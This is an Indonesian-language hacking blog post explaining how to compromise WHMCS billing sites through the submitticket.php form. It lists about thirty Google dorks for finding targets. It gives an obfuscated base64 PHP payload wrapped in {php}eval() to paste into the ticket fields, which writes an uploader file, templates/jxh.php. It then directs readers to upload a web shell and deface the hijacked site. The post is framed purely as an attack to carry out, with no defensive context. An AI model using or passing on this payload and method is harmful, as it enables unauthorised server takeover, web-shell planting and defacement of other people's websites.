kali ini saya akan mengaasih tau cara exploit submit ticket WHMCS
sebetulnya di google udah banyak kaya gini ..
mending kita langsung saja dah ke cara''nya:
dork:
Quote:intext:Powered by WHMCompleteSolution inurl:submitticket.php
intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php
intext:Powered by WHMCompleteSolution inurl:client/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php
intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php
intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php
intext:Powered by WHMCompleteSolution inurl:member/submitticket.php
intext:Powered by WHMCompleteSolution inurl:members/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
intext:Powered by WHMCompleteSolution inurl:support/submitticket.php
intext:Powered by WHMCompleteSolution inurl:help/submitticket.php
intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php
intext:Powered by WHMCompleteSolution inurl:store/submitticket.php
intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php
intext:Powered by WHMCompleteSolution inurl:log/submitticket.php
intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php
intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php
intext:Powered by WHMCompleteSolution inurl:order/submitticket.php
intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php
intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
intext:Powered by WHMCompleteSolution inurl:office/submitticket.php
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info
intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"
intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
Steb By Step :
1 : Gunakan pencarian google menggunakan salah satu Dork Diatas ,,
2: Cari Web yang kira" bisa " Ga Semua Bsa Ibaratkan Nasib"pan ( tergantung hoki hokian gan )
Contoh http://www.TARGET.com/client/submitticket.php
Nih contoh SS nya :
![[Image: 15920778f04dd97a72a5bd9bcb0d3546c965670e.jpg]](http://img8.uploadhouse.com/fileuploads/15920/15920778f04dd97a72a5bd9bcb0d3546c965670e.jpg)
3: yap udah dapet targetnya sekarang saatnya kirim ticketnya ..
Taruh code php ini di Form Nama , subject , isi . ( untuk yang email , ngasal aja )
code phpnya :
Quote:{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt='));{/php})
gini jadi nya :
![[Image: image.jpg]](http://s13.postimage.org/twa4tm7bb/image.jpg)
mari kita cek berhasil apa kaga
ganti url submitticket.php jadi /templates/jxh.php
Contoh : http://www.TARGET.com/client/templates/jxh.php
nih contoh nya :
![[Image: image.jpg]](http://s15.postimage.org/4bmpvzlxn/image.jpg)
nah Sudah dsitu Tinggal Kita Upload Shell aja Atau Mau Upload apa aja Terserah ente
Kalau Sudah Kita Upload Disini Kita akan Melihat Shell Kita upload tadi
Contoh : http://www.TARGET.com/client/templates/jxh.php <-- kita ganti yg jxh.php menjadi nama shell kita upload tadi semisal froge.php
jadi gini :
![[Image: image.jpg]](http://s13.postimage.org/hw2gy441z/image.jpg)
skarang web tersebut ada di tangan anda,
seterah mau tusbol indexnya mau perkosa kek
pokoknya seterah anda
sumber : akiramitsu indonesianredhat
No comments:
Post a Comment